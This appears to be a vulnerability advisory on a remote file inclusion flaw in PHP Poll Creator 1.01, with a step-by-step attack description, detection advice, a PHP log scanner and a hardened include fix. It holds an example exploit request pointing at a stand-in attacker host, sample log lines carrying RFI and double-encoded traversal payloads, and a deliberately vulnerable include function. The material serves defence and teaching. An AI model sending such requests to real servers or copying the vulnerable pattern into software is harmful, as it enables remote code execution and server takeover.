Source: cve@mitre.org
PHP remote file inclusion vulnerability in poll_vote.php in PHP Poll Creator 1.01 allows remote attackers to execute arbitrary PHP code via the relativer_pfad parameter.
PHP Poll Creator 1.01 is vulnerable to a remote file inclusion (RFI) attack, allowing attackers to execute arbitrary PHP code on the server. This vulnerability, exploited via the relativer_pfad parameter, can lead to complete system compromise and data breaches, potentially impacting confidentiality, integrity, and availability.
Step 1: Vulnerability Identification: The attacker locates a web server running PHP Poll Creator 1.01 and finds the poll_vote.php script.
Step 2: Payload Preparation: The attacker crafts a malicious PHP script, either hosted on a remote server or placed on the target server (if possible through other vulnerabilities or misconfigurations).
Step 3: Payload Delivery: The attacker sends a crafted HTTP request to poll_vote.php containing the relativer_pfad parameter, pointing to the location of the malicious PHP script (e.g., poll_vote.php?relativer_pfad=http://attacker.com/malicious.txt).
Step 4: Code Execution: The poll_vote.php script, due to the lack of input validation, includes the attacker's malicious PHP script. The server's PHP interpreter then executes the injected code.
Step 5: System Compromise: The attacker's code executes, potentially allowing them to gain a shell, upload webshells, steal sensitive data, or otherwise compromise the server.
The vulnerability stems from a lack of input validation and sanitization in the poll_vote.php script. The script uses the relativer_pfad parameter to include files without properly verifying the source or content. This allows an attacker to inject malicious PHP code by pointing relativer_pfad to a remote or local file containing the attacker's code. The included file is then executed by the PHP interpreter, granting the attacker control over the server's resources. The root cause is the insecure use of the include or require functions with user-controlled input, leading to code execution.
This vulnerability is a classic example of a web application security flaw. While no specific APTs are directly tied to this CVE, it is the type of vulnerability that could be exploited by any attacker, including those involved in ransomware campaigns or data theft. This vulnerability is not listed on the CISA KEV as of the current date, but the underlying RFI issue is a common attack vector.
Monitor web server access logs for suspicious requests to poll_vote.php with the relativer_pfad parameter, especially those containing URLs or unusual file paths.
Analyze HTTP requests for unusual User-Agent strings or other indicators of malicious activity.
Implement file integrity monitoring to detect changes to PHP files, especially those related to the poll application.
Network Intrusion Detection Systems (IDS) can be configured to detect RFI attempts by looking for patterns in HTTP requests, such as query parameters whose values carry a URL or stream-wrapper scheme (an http:// prefix, for example) pointing at an external host.
Examine PHP error logs for unexpected file inclusion errors or warnings.
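The access-log check described above, written out as an added example (it is not part of the advisory or of PHP Poll Creator). It scans combined-format access log lines for requests to poll_vote.php whose relativer_pfad value carries a URL scheme or a ".." path segment, decoding the value twice so that double-encoded payloads are not missed. The log lines are constructed for the example, and the /poll/ directory is an assumption.

```php
<?php
// Added example, not code from the advisory or from the PHP Poll Creator project.
// Requires PHP 8.0+ (str_ends_with). Constructed log lines, not real traffic:
const LOG_LINES = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /poll/poll_vote.php?poll_id=3&relativer_pfad=./ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /poll/poll_vote.php?relativer_pfad=http://203.0.113.99/x.txt%3F HTTP/1.1" 200 2048 "-" "curl/7.88"',
    '198.51.100.7 - - [10/Oct/2023:13:55:41 +0000] "GET /poll/poll_vote.php?relativer_pfad=%252e%252e%252fincludes%252fconfig.php HTTP/1.1" 500 0 "-" "curl/7.88"',
    '192.0.2.9 - - [10/Oct/2023:13:56:00 +0000] "GET /index.php?relativer_pfad=http://example.net/ HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
];

// Pull the request target out of a combined-format line and split it into
// path and decoded query parameters.
function parse_request(string $line): ?array
{
    if (!preg_match('/"(GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return null;
    }
    [$path, $query] = explode('?', $m[2], 2) + [1 => ''];
    parse_str($query, $params);          // parse_str() URL-decodes once
    return ['path' => $path, 'params' => $params];
}

// Heuristics for the parameter value: a scheme prefix (remote include or a
// PHP stream wrapper) or a ".." segment (local traversal). A second decode
// catches values that were percent-encoded twice to slip past naive filters.
function classify_pfad(string $value): ?string
{
    $v = rawurldecode($value);
    if (preg_match('#^\s*[a-z][a-z0-9+.-]*://#i', $v)) {
        return 'remote-or-wrapper-url';
    }
    if (preg_match('#(^|[/\\\\])\.\.([/\\\\]|$)#', $v)) {
        return 'path-traversal';
    }
    return null;
}

// Returns one entry per suspicious request, keyed by 1-based log line number.
function scan_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $n => $line) {
        $req = parse_request($line);
        if ($req === null || !str_ends_with($req['path'], '/poll_vote.php')) {
            continue;                    // only the vulnerable script matters here
        }
        if (!isset($req['params']['relativer_pfad'])) {
            continue;
        }
        $value = (string) $req['params']['relativer_pfad'];
        $kind  = classify_pfad($value);
        if ($kind !== null) {
            $hits[] = ['line' => $n + 1, 'kind' => $kind, 'value' => $value];
        }
    }
    return $hits;
}

foreach (scan_log(LOG_LINES) as $hit) {
    printf("line %d: %s (%s)\n", $hit['line'], $hit['kind'], $hit['value']);
}
```

On the constructed input the second line is reported as a remote URL and the third as traversal; the first carries a benign relative path and the fourth targets a different script, so neither is reported. The same classify_pfad() check can be fed the decoded query string from a WAF or IDS rule, where the scheme-prefix pattern is the one worth alerting on with the highest priority.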
Upgrade to a patched version of PHP Poll Creator (if available). Since this is an old version, this may not be possible. Consider removing the application if it is no longer needed.
Implement input validation and sanitization on all user-supplied input, especially the relativer_pfad parameter. Ensure that the input is a valid local file path and does not contain any malicious characters or URLs.
Disable the use of remote file inclusion in the PHP configuration (allow_url_include = Off).
Use a web application firewall (WAF) to filter malicious requests and block RFI attempts.
Regularly scan the web server for vulnerabilities and apply security patches promptly.
Implement the principle of least privilege, ensuring that the web server user has only the necessary permissions to access files and directories.
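The root-cause pattern and the input-validation fix, shown side by side as an added example (this is not PHP Poll Creator's code; the parameter name relativer_pfad is from the advisory, while the file layout, the allow-list keys and the function names are assumptions). One caveat worth stating: allow_url_include = Off stops the remote variant only, so a user-controlled value passed to include() can still pull in any readable local file; the fix below therefore never derives a filename from the request at all and adds a realpath() boundary check as defence in depth.

```php
<?php
// Added example, not code from the PHP Poll Creator project.
// File layout and names below are assumptions for illustration.

// --- Vulnerable pattern (the class of defect described in the advisory) ---
// Request data flows straight into include(). With allow_url_include=On this
// accepts http://... targets; with it Off it still allows local traversal.
function vulnerable_include(string $relativer_pfad): void
{
    include $relativer_pfad . 'poll_config.php';
}

// --- Hardened replacement ---
// Complements the allow_url_include=Off mitigation: refuse to run at all if
// the interpreter still permits remote includes.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('allow_url_include is enabled; refusing to serve');
    exit(1);
}

const POLL_BASE_DIR = __DIR__ . '/polls';      // assumed application directory

const ALLOWED_INCLUDES = [                      // assumed allow-list of keys
    'default' => 'poll_config.php',
    'archive' => 'archive/poll_config.php',
];

// Map a request value to a file through the allow-list, then confirm the
// resolved path is still inside POLL_BASE_DIR. realpath() returns false for
// missing files and collapses "..", so the prefix comparison is meaningful.
function resolve_include(string $key): ?string
{
    if (!array_key_exists($key, ALLOWED_INCLUDES)) {
        return null;                            // unknown key: refuse
    }
    $base      = realpath(POLL_BASE_DIR);
    $candidate = realpath(POLL_BASE_DIR . '/' . ALLOWED_INCLUDES[$key]);
    if ($base === false || $candidate === false
        || strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

function safe_include(string $key): void
{
    $path = resolve_include($key);
    if ($path === null) {
        http_response_code(400);
        exit('invalid poll selection');
    }
    include $path;
}

// Assumed request handler: the raw parameter is only ever a lookup key and
// never becomes part of a filename.
safe_include($_GET['relativer_pfad'] ?? 'default');
```

The allow-list alone closes the hole; the realpath() boundary check is kept so that a later edit adding a new allow-list entry with a stray "../" cannot silently reopen it, and it should be run by the web server user so that least-privilege file permissions apply to whatever does get included.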